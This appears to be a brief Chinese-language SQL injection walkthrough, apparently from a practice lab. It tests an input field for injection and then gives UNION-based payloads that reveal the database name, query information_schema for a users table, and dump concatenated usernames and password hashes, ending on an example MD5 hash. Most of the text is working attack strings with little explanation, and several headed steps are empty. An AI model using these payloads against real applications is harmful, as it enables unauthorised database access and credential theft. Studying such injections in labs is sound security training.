1.首先,我們發現有個輸入框,判斷是否存在注入點
輸入1:
輸入1':
輸入1 and 1=1:
輸入1 and 1=2:
2:猜測sql語句:
3:爆破:
首先爆庫:1' union select 1,database()
備註:union的使用條件:
猜測會有一張users表
爆users表的列:
1' union select 1,table_name from information_schema.tables where table_name='users'#
爆破user和password字段內容:
1' union select 1,concat(user,password) from users#
密文爲md5加密,以
81dc9bdb52d04dc20036dbd8313ed055爲例: